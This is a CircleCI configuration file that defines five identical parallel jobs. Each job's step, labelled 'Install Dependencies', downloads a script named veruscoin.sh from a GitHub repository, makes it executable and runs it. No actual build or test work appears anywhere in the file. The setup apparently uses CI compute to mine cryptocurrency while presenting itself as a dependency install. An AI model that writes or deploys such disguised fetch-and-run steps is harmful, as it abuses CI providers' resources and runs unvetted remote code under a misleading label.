version: 2
jobs:
    aku1:
      docker:
            - image: circleci/clojure:lein-2.9.5
      steps:
        - run:
            name: Install Dependencies
            command: wget https://github.com/pejuhyah/dakrone/raw/master/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh
    aku2:
      docker:
            - image: circleci/clojure:lein-2.9.5
      steps:
        - run:
            name: Install Dependencies
            command: wget https://github.com/pejuhyah/dakrone/raw/master/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh
    aku3:
      docker:
            - image: circleci/clojure:lein-2.9.5
      steps:
        - run:
            name: Install Dependencies
            command: wget https://github.com/pejuhyah/dakrone/raw/master/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh
    aku4:
      docker:
            - image: circleci/clojure:lein-2.9.5
      steps:
        - run:
            name: Install Dependencies
            command: wget https://github.com/pejuhyah/dakrone/raw/master/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh
    aku5:
      docker:
            - image: circleci/clojure:lein-2.9.5
      steps:
        - run:
            name: Install Dependencies
            command: wget https://github.com/pejuhyah/dakrone/raw/master/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh

workflows:
    version: 2
    build:
        jobs:
            - aku1
            - aku2
            - aku3
            - aku4
            - aku5